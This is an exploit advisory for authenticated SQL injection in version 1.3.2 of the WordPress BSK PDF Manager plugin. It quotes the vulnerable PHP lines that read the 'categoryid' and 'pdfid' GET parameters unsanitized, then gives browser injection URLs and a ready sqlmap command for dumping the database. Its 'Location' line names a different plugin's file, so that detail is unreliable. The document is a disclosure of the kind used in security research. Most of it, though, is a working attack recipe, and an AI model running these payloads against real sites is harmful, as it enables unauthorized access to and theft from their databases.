WordPress BSK PDF Manager 1.3.2 SQL Injection

Wordpress BSK PDF Manager

 

######################
# Exploit Title : WordPress BSK PDF Manager 1.3.2 Authenticated SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/

# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip

# Date : 2014-07-04

# Tested on : Windows 7 / Mozilla Firefox
#              Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0

######################

# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['categoryid']) && $_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $pdf_id = trim($_GET['pdfid']);


$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);

######################

Exploit Code via Browser:

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

Exploit Code via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid
#####################

Discovered By : Claudio Viviani
        http://www.homelab.it
        info@homelab.it

        https://www.facebook.com/homelabit
        https://twitter.com/homelabit
        https://plus.google.com/+HomelabIt1/
        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################